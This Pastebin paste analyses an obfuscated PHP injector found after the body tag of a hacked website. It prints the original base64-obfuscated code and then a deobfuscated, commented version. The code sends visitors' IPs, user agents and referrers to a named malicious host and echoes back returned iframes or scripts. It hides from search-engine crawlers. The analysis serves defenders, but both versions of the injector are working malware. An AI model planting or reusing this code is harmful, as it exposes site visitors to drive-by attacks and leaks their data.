Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <? /* This script was found lying after the <body> tag of a website whose host had been hacked. It is an example of significant obfuscation and is subsequently dissected and analyzed below.
- The ten digit numbers use as array names have been changed in case they are uniquely identifiable.
- <? $GLOBALS['_1234567890_']=Array(base64_decode('c3RyX' .'3JlcGxhY2U='),base64_decode('c' .'3RyX3JlcGxh' .'Y2U='),base64_decode('Y3VybF' .'9pb' .'ml' .'0'),base64_decode('Y' .'3VybF' .'9zZXR' .'vcH' .'Q='),base64_decode('Y3V' .'ybF9' .'zZXRvc' .'HQ='),base64_decode('Y3Vy' .'bF9leG' .'Vj'),base64_decode('' .'Y3VybF' .'9jbG9zZQ=='),base64_decode('c' .'3' .'Vic3' .'RyX2NvdW50'),base64_decode('c3Vic' .'3R' .'yX' .'2NvdW' .'50'),base64_decode('' .'c3V' .'ic3' .'Ry' .'X2' .'NvdW50'),base64_decode('c3' .'Vic3RyX2Nv' .'dW50'),base64_decode('Z2' .'V0aG9' .'zd' .'G' .'J5' .'YWRkc' .'g=='),base64_decode('Z' .'Xhwb' .'G9kZQ=='),base64_decode('ZXhwbG' .'9' .'kZQ=='),base64_decode('' .'dHJpbQ' .'=='),base64_decode('c' .'3Vic3R' .'yX2NvdW50'),base64_decode('' .'c3Vic3RyX2N' .'vdW' .'5' .'0'),base64_decode('c3' .'Vic' .'3' .'Ry' .'X2N' .'vdW5' .'0'),base64_decode('c3Vic3Ry' .'X' .'2N' .'vdW50'),base64_decode('' .'c' .'3Vi' .'c3R' .'yX2NvdW50'),base64_decode('c3Vic' .'3RyX2Nvd' .'W50'),base64_decode('c' .'3V' .'i' .'c3' .'R' .'yX2N' .'vdW50'),base64_decode('c3Vic3RyX2NvdW50'),base64_decode('' .'c3' .'Vi' .'c' .'3' .'RyX' .'2Nvd' .'W50'),base64_decode('c' .'3' .'V' .'ic3RyX2' .'NvdW50'),base64_decode('c3V' .'ic' .'3Ry' .'X2N' .'vdW50'),base64_decode('c3Vic3RyX2' .'NvdW50'),base64_decode('c3Vic3Ry' .'X2NvdW' .'5' .'0'),base64_decode('c3Vic3R' .'y' .'X2NvdW50'),base64_decode('c3V' .'ic3' .'RyX2' .'NvdW5' .'0'),base64_decode('c3Vi' .'c' .'3RyX' .'2N' .'vdW50'),base64_decode('c3' .'Vic3RyX' .'2' .'NvdW50')); ?><? function _0987654321($i){$a=Array('IA==','Kw==','Jg==','LS11dQ==','aHR0cDovL25lYXJkYW1uZ29vZC5pbmZvL2FydGljbGVzL2ltYWdlcy9pZnIucGhwP2tleT0=','Jmhvc3Q9','JmFnZW50PQ==','JnJpcD0=','JnJlZj0=','aWZyYW1l','c2NyaXB0','bm90aGluZ2c=','bm90aGluZ2c=','bm90Zm91bmRk','bm90Zm91bmRk','','SFRUUF9VU0VSX0FHRU5U','UkVNT1RFX0FERFI=','SFRUUF9SRUZFUkVS','SFRUUF9IT1NU','UkVRVUVTVF9VUkk=','','UVVFUllfU1RSSU5H','Lg==','Lg==','NjY=','MjQ5','MjE5','NzQ=','MTI1','NjQ=','MjMz','MTk0','OA==','Z29vZ2xl','R29vZ2xl','cGlkZXI=','UElERVI=','cmF3bGVy','UkFXTEVS','Ym90','Qm90','Qk9U','YXNrLmNvbQ==','TGludXg=','bGludXg=','dHJhbnNsYXRlLmdvb2dsZS5jb20=','TVNJRQ==','RmlyZWZveA==','SFRUUF9IT1NU','bm90Zm91bmRk','bm90aGluZ2c=');return base64_decode($a[$i]);} ?><? function l__0($_0,$_1,$_2,$_3,$_4){$_2=$GLOBALS['_1234567890_'][0](_0987654321(0),_0987654321(1),$_2);$_4=$GLOBALS['_1234567890_'][1](_0987654321(2),_0987654321(3),$_4);$_5=$GLOBALS['_1234567890_'][2](_0987654321(4) .$_0 ._0987654321(5) .$_1 ._0987654321(6) .$_2 ._0987654321(7) .$_3 ._0987654321(8) .$_4);$GLOBALS['_1234567890_'][3]($_5,CURLOPT_HEADER,round(0));$GLOBALS['_1234567890_'][4]($_5,CURLOPT_RETURNTRANSFER,round(0+0.5+0.5));$_6=$GLOBALS['_1234567890_'][5]($_5);$GLOBALS['_1234567890_'][6]($_5);if($GLOBALS['_1234567890_'][7]($_6,_0987654321(9))||$GLOBALS['_1234567890_'][8]($_6,_0987654321(10)))return $_6;elseif($GLOBALS['_1234567890_'][9]($_6,_0987654321(11)))return _0987654321(12);elseif($GLOBALS['_1234567890_'][10]($_6,_0987654321(13)))return _0987654321(14);else return _0987654321(15);}$_2=$_SERVER[_0987654321(16)];$_3=$_SERVER[_0987654321(17)];$_7=$GLOBALS['_1234567890_'][11]($_3);$_4=$_SERVER[_0987654321(18)];$_1=$_SERVER[_0987654321(19)];$_0=$_SERVER[_0987654321(20)];if($_8== _0987654321(21))$_8=$_SERVER[_0987654321(22)];$_1=$GLOBALS['_1234567890_'][12](_0987654321(23),$_1);$_9=$_3;$_3=$GLOBALS['_1234567890_'][13](_0987654321(24),$_3);$_2=$GLOBALS['_1234567890_'][14]($_2);if(($_3[round(0)]== _0987654321(25)&&($_3[round(0+0.2+0.2+0.2+0.2+0.2)]== _0987654321(26)||$_3[round(0+0.2+0.2+0.2+0.2+0.2)]== _0987654321(27)))||($_3[round(0)]== _0987654321(28)&&$_3[round(0+1)]== _0987654321(29))||($_3[round(0)]== _0987654321(30)&&$_3[round(0+1)]== _0987654321(31)&&($_3[round(0+2)]<=round(0+47.75+47.75+47.75+47.75)&&$_3[round(0+0.4+0.4+0.4+0.4+0.4)]>=round(0+32+32+32+32+32)))||($_3[round(0)]== _0987654321(32)&&$_3[round(0+0.2+0.2+0.2+0.2+0.2)]== _0987654321(33))||($GLOBALS['_1234567890_'][15]($_7,_0987654321(34))>round(0))||($GLOBALS['_1234567890_'][16]($_7,_0987654321(35))>round(0))||($GLOBALS['_1234567890_'][17]($_2,_0987654321(36)))||($GLOBALS['_1234567890_'][18]($_2,_0987654321(37)))||($GLOBALS['_1234567890_'][19]($_2,_0987654321(38)))||($GLOBALS['_1234567890_'][20]($_2,_0987654321(39)))||($GLOBALS['_1234567890_'][21]($_2,_0987654321(40)))||($GLOBALS['_1234567890_'][22]($_2,_0987654321(41)))||($GLOBALS['_1234567890_'][23]($_2,_0987654321(42)))||($GLOBALS['_1234567890_'][24]($_2,_0987654321(43)))||($GLOBALS['_1234567890_'][25]($_2,_0987654321(44)))||($GLOBALS['_1234567890_'][26]($_2,_0987654321(45)))||($GLOBALS['_1234567890_'][27]($_2,_0987654321(46)))){}else{if(($GLOBALS['_1234567890_'][28]($_2,_0987654321(47))>round(0))||($GLOBALS['_1234567890_'][29]($_2,_0987654321(48))>round(0))){$_10=l__0($_0,$_SERVER[_0987654321(49)],$_2,$_9,$_4);if($GLOBALS['_1234567890_'][30]($_10,_0987654321(50))){}if($GLOBALS['_1234567890_'][31]($_10,_0987654321(51))){}else if($_10)echo $_10;}} ?>
- */ ?>
- <?
- // Part 1: The function array
- //
- // Levels of obfuscation:
- // 1. function names are base64 encoded
- // $string = base64_encode("substr_count");
- // return $string; // returns "c3Vic3RyX2NvdW50"
- // 2. the resulting strings are broken apart randomly
- // echo 'str'.'ing'; // "string"
- // i.e. 'c3Vic'.'3R'.'yX'.'2NvdW'.'50'
- // 3. those encoded names are placed into an array wrapped by base64_decode()
- // $GLOBALS['_1234567890_'][8] returns "substr_count"
- $GLOBALS['_1234567890_']=Array(
- base64_decode('c3RyX' .'3JlcGxhY2U='),
- // [0] => "str_replace"
- base64_decode('c' .'3RyX3JlcGxh' .'Y2U='),
- // [1] => "str_replace"
- base64_decode('Y3VybF' .'9pb' .'ml' .'0'),
- // [2] => "curl_init"
- base64_decode('Y' .'3VybF' .'9zZXR' .'vcH' .'Q='),
- // [3] => "curl_setopt"
- base64_decode('Y3V' .'ybF9' .'zZXRvc' .'HQ='),
- // [4] => "curl_setopt"
- base64_decode('Y3Vy' .'bF9leG' .'Vj'),
- // [5] => "curl_exec"
- base64_decode('' .'Y3VybF' .'9jbG9zZQ=='),
- // [6] => "curl_close"
- base64_decode('c' .'3' .'Vic3' .'RyX2NvdW50'),
- // [7] => "substr_count"
- base64_decode('c3Vic' .'3R' .'yX' .'2NvdW' .'50'),
- // [8] => "substr_count"
- base64_decode('' .'c3V' .'ic3' .'Ry' .'X2' .'NvdW50'),
- // [9] => "substr_count"
- base64_decode('c3' .'Vic3RyX2Nv' .'dW50'),
- // [10] => "substr_count"
- base64_decode('Z2' .'V0aG9' .'zd' .'G' .'J5' .'YWRkc' .'g=='),
- // [11] => "gethostbyaddr"
- base64_decode('Z' .'Xhwb' .'G9kZQ=='),
- // [12] => "explode"
- base64_decode('ZXhwbG' .'9' .'kZQ=='),
- // [13] => "explode"
- base64_decode('' .'dHJpbQ' .'=='),
- // [14] => "trim"
- base64_decode('c' .'3Vic3R' .'yX2NvdW50'),
- // [15] => "substr_count"
- base64_decode('' .'c3Vic3RyX2N' .'vdW' .'5' .'0'),
- // [16] => "substr_count"
- base64_decode('c3' .'Vic' .'3' .'Ry' .'X2N' .'vdW5' .'0'),
- // [17] => "substr_count"
- base64_decode('c3Vic3Ry' .'X' .'2N' .'vdW50'),
- // [18] => "substr_count"
- base64_decode('' .'c' .'3Vi' .'c3R' .'yX2NvdW50'),
- // [19] => "substr_count"
- base64_decode('c3Vic' .'3RyX2Nvd' .'W50'),
- // [20] => "substr_count"
- base64_decode('c' .'3V' .'i' .'c3' .'R' .'yX2N' .'vdW50'),
- // [21] => "substr_count"
- base64_decode('c3Vic3RyX2NvdW50'),
- // [22] => "substr_count"
- base64_decode('' .'c3' .'Vi' .'c' .'3' .'RyX' .'2Nvd' .'W50'),
- // [23] => "substr_count"
- base64_decode('c' .'3' .'V' .'ic3RyX2' .'NvdW50'),
- // [24] => "substr_count"
- base64_decode('c3V' .'ic' .'3Ry' .'X2N' .'vdW50'),
- // [25] => "substr_count"
- base64_decode('c3Vic3RyX2' .'NvdW50'),
- // [26] => "substr_count"
- base64_decode('c3Vic3Ry' .'X2NvdW' .'5' .'0'),
- // [27] => "substr_count"
- base64_decode('c3Vic3R' .'y' .'X2NvdW50'),
- // [28] => "substr_count"
- base64_decode('c3V' .'ic3' .'RyX2' .'NvdW5' .'0'),
- // [29] => "substr_count"
- base64_decode('c3Vi' .'c' .'3RyX' .'2N' .'vdW50'),
- // [30] => "substr_count"
- base64_decode('c3' .'Vic3RyX' .'2' .'NvdW50')
- // [31] => "substr_count"
- );
- ?>
- <?
- // Part 2: The string array
- //
- // Levels of obfuscation:
- // 1. The strings are base64_encoded in the same way as above
- // 2. The resulting strings are placed into an array
- function _0987654321($i)
- {
- $a=Array(
- 'IA==',
- // [0] => " "
- 'Kw==',
- // [1] => "+"
- 'Jg==',
- // [2] => "&"
- 'LS11dQ==',
- // [3] => "--uu"
- 'aHR0cDovL25lYXJkYW1uZ29vZC5pbmZvL2FydGljbGVzL2ltYWdlcy9pZnIucGhwP2tleT0=',
- // [4] => "http://neardamngood.info/articles/images/ifr.php?key="
- // Note: Please do not visit this website. Their code is malicious.
- 'Jmhvc3Q9',
- // [5] => "&host="
- 'JmFnZW50PQ==',
- // [6] => "&agent="
- 'JnJpcD0=',
- // [7] => "&rip="
- 'JnJlZj0=',
- // [8] => "&ref="
- 'aWZyYW1l',
- // [9] => "iframe"
- 'c2NyaXB0',
- // [10] => "script"
- 'bm90aGluZ2c=',
- // [11] => "nothingg"
- 'bm90aGluZ2c=',
- // [12] => "nothingg"
- 'bm90Zm91bmRk',
- // [13] => "notfoundd"
- 'bm90Zm91bmRk',
- // [14] => "notfoundd"
- '',
- // [15] => ""
- 'SFRUUF9VU0VSX0FHRU5U',
- // [16] => "HTTP_USER_AGENT"
- 'UkVNT1RFX0FERFI=',
- // [17] => "REMOTE_ADDR"
- 'SFRUUF9SRUZFUkVS',
- // [18] => "HTTP_REFERER"
- 'SFRUUF9IT1NU',
- // [19] => "HTTP_HOST"
- 'UkVRVUVTVF9VUkk=',
- // [20] => "REQUEST_URI"
- '',
- // [21] => [21] => ""
- 'UVVFUllfU1RSSU5H',
- // [22] => "QUERY_STRING"
- 'Lg==',
- // [23] => "."
- 'Lg==',
- // [24] => "."
- 'NjY=',
- // [25] => "66"
- 'MjQ5',
- // [26] => "249"
- 'MjE5',
- // [27] => "219"
- 'NzQ=',
- // [28] => "74"
- 'MTI1',
- // [29] => "125"
- 'NjQ=',
- // [30] => "64"
- 'MjMz',
- // [31] => "233"
- 'MTk0',
- // [32] => "194"
- 'OA==',
- // [33] => "8"
- 'Z29vZ2xl',
- // [34] => "google"
- 'R29vZ2xl',
- // [35] => "Google"
- 'cGlkZXI=',
- // [36] => "pider"
- 'UElERVI=',
- // [37] => "PIDER"
- 'cmF3bGVy',
- // [38] => "rawler"
- 'UkFXTEVS',
- // [39] => "RAWLER"
- 'Ym90',
- // [40] => "bot"
- 'Qm90',
- // [41] => "Bot"
- 'Qk9U',
- // [42] => "BOT"
- 'YXNrLmNvbQ==',
- // [43] => "ask.com"
- 'TGludXg=',
- // [44] => "Linux"
- 'bGludXg=',
- // [45] => "linux"
- 'dHJhbnNsYXRlLmdvb2dsZS5jb20=',
- // [46] => "translate.google.com"
- 'TVNJRQ==',
- // [47] => "MSIE"
- 'RmlyZWZveA==',
- // [48] => "Firefox"
- 'SFRUUF9IT1NU',
- // [49] => "HTTP_HOST"
- 'bm90Zm91bmRk',
- // [50] => "notfoundd"
- 'bm90aGluZ2c='
- // [51] => "nothingg"
- );
- // Unlike the function array, the string array is
- // wrapped in a function to decode each string called
- // i.e. _0987654321(34) returns "google"
- return base64_decode($a[$i]);
- }
- ?>
- <?
- // The primary function
- //
- // The purpose of function l__0 is to query an external site for an <iframe> or
- // <script> to insert into the current page. It does this using cURL after
- // creating a lengthy query which submits a number of environment variables
- // to that external site.
- //
- // 1. Because the functions and strings are inside arrays with random names,
- // this function becomes a mess of seemingly nonsensical variables. In order
- // to clarify for readability, I have replaced calls to both arrays with
- // their resulting output.
- // i.e. $_2=$GLOBALS['_1234567890_'][0](_0987654321(0),_0987654321(1),$_2);
- // becomes $_2=str_replace(' ','+',$_2);
- // 2. Often times throughout this function, integers are called through a
- // creative use of the round() function, i.e.
- // round(0+0.2+0.2+0.2+0.2+0.2) returns 1 (simple math)
- function l__0($_0,$_1,$_2,$_3,$_4)
- {
- // $_2 is submitted to the function as the output of $_SERVER['HTTP_USER_AGENT']
- $_2 = str_replace(' ', '+', $_2);
- // This replaces any spaces in the useragent with a +
- // $_4 == $_SERVER['HTTP_REFERER']
- $_4 = str_replace('&', '--uu', $_4);
- // Leaving &'s in the referrer would mess with the query so they are
- // replaced with --uu
- // Create the query
- $_5 = curl_init(
- // Note: Please do not visit this website. Their code is malicious.
- 'http://neardamngood.info/articles/images/ifr.php?key='
- . $_0 // $_SERVER['REQUEST_URI']
- . '&host='
- . $_1 // $_SERVER['HTTP_HOST']
- . '&agent='
- . $_2 // $_SERVER['HTTP_USER_AGENT'] (cleaned)
- . '&rip='
- . $_3 // $_SERVER['REMOTE_ADDR']
- . '&ref='
- . $_4 // $_SERVER['HTTP_REFERER'] (cleaned)
- );
- curl_setopt($_5,CURLOPT_HEADER,0);
- // Don't include the header in the output
- curl_setopt($_5,CURLOPT_RETURNTRANSFER,1);
- // Do return the result as a string
- $_6=curl_exec($_5);
- // $_6 now contains a string of whatever output was printed by the
- // remote site when we gave it our environment variables.
- curl_close($_5);
- // Error checking the output
- if(
- substr_count($_6, 'iframe') || substr_count($_6, 'script')
- )
- // If the result includes "iframe" or "script", return the result
- return $_6;
- elseif(
- substr_count($_6, 'nothingg')
- )
- // If it contains the previous string, return only that string.
- return 'nothingg';
- elseif(
- substr_count($_6, 'notfoundd');
- )
- // If it contains the previous string, return only that string.
- return 'notfoundd';
- // Otherwise, return nothing.
- else return '';
- }
- // Defining the input for the primary function
- $_2 = $_SERVER['HTTP_USER_AGENT'];
- $_3 = $_SERVER['REMOTE_ADDR'];
- $_7 = gethostbyaddr($_3); // $_7 is only used to check for
- // google robots
- $_4 = $_SERVER['HTTP_REFERER'];
- $_1 = $_SERVER['HTTP_HOST'];
- $_0 = $_SERVER['REQUEST_URI'];
- if($_8 == '') $_8 = $_SERVER['QUERY_STRING'];// This is not used for anything
- $_1 = explode('.', $_1); // Break the host IP address
- // into an array delineated by "."
- $_9 = $_3; // Copy user's IP address into a
- // secondary variable prior to
- $_3 = explode('.',$_3); // exploding it the same way
- $_2 = trim($_2);
- // Input verification
- // This if() statement checks to see if any of the following apply, and if so,
- // to do nothing.
- // Ip address verification [0].[1].[2].[3]
- if(
- ($_3[0]== 66 &&
- ($_3[1]== 249 || // if 66.249.*.* or
- $_3[1]== 219))|| // 66.219.*.* or
- ($_3[0]== 74 && $_3[1]== 125) || // 74.125.*.* or
- ($_3[0]== 64 && $_3[1]== 233 && ($_3[2] <= 191) && $_3[2]>=160)) ||
- // 64.233.0-191.160-255 or
- ($_3[0]== 194 &&$_3[1]== 8) || // 194.8.*.* or
- // User agent verification
- (substr_count($_7,'google')>0) || // If these strings are found
- (substr_count($_7,'Google')>0) || // in the useragent
- (substr_count($_2,'pider')) ||
- (substr_count($_2,'PIDER')) ||
- (substr_count($_2,'rawler')) ||
- (substr_count($_2,'RAWLER')) ||
- (substr_count($_2,'bot')) ||
- (substr_count($_2,'Bot')) ||
- (substr_count($_2,'BOT')) ||
- (substr_count($_2,'ask.com')) ||
- (substr_count($_2,'Linux')) ||
- (substr_count($_2,'linux')) ||
- (substr_count($_2,'translate.google.com'))
- )
- {
- // if the ip address falls within the following ranges:
- // 66.249.*.*
- // 66.219.*.*
- // 74.125.*.*
- // 64.233.0-191.160-255
- // 194.8.*.*
- // or if the useragent is a search engine,
- // do nothing.
- }
- else{
- // However, if the useragent is internet explorer or firefox,
- if(
- (substr_count($_2, 'MSIE')>0) ||
- (substr_count($_2, 'Firefox')>0)
- )
- {
- // Send our information and pull the iframe or script from the remote host.
- $_10=l__0($_0,$_SERVER['HTTP_HOST'],$_2,$_9,$_4);
- // $_0 = $_SERVER['REQUEST_URI']
- // $_2 = $_SERVER['HTTP_USER_AGENT']
- // $_9 = $_SERVER['REMOTE_ADDR']
- // $_4 = $_SERVER['HTTP_REFERER']
- if(substr_count($_10,'notfoundd'))
- {
- // if the remote host does not return an iframe or script, do nothing
- }
- if(substr_count($_10,'nothingg'))
- {
- }
- else if($_10) echo $_10;
- // otherwise, echo the result to the page.
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement